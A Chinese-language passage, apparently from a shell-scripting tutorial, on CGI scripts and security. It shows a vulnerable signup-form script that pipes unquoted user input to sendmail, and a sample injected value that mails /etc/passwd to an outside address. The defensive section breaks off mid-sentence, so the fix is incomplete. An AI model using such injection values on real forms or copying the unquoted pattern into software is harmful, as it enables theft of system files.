网站管理黑客技巧:CGI脚本的应用与安全
1. 引言
Shell脚本不仅能为构建与各种网站协作的出色命令行工具提供良好环境,还能改变你自己网站的运行方式。本章介绍的脚本均为通用网关接口(CGI)脚本,用于生成动态网页。不过,在编写CGI脚本时,必须时刻留意可能存在的安全风险。
2. CGI脚本的安全风险与防范
- 安全风险示例:以一个收集用户电子邮件地址的网页表单为例,其处理脚本将用户信息存储在本地数据库并发送确认邮件。但如果用户输入恶意内容,如
sendmail d00d37@das-hak.de < /etc/passwd; echo taylor@intuitivestories.com,就可能导致系统安全受到威胁,攻击者会获取/etc/passwd文件。
( echo "Subject: Thanks for your signup" echo "To: $email ($name)" echo "" echo "Thanks for signing up. You'll hear from us shortly." echo "-- Dave and Brandon" ) | sendmail $email- 防范措施
- 使用
-t标志:对上述脚本进行小
- 使用
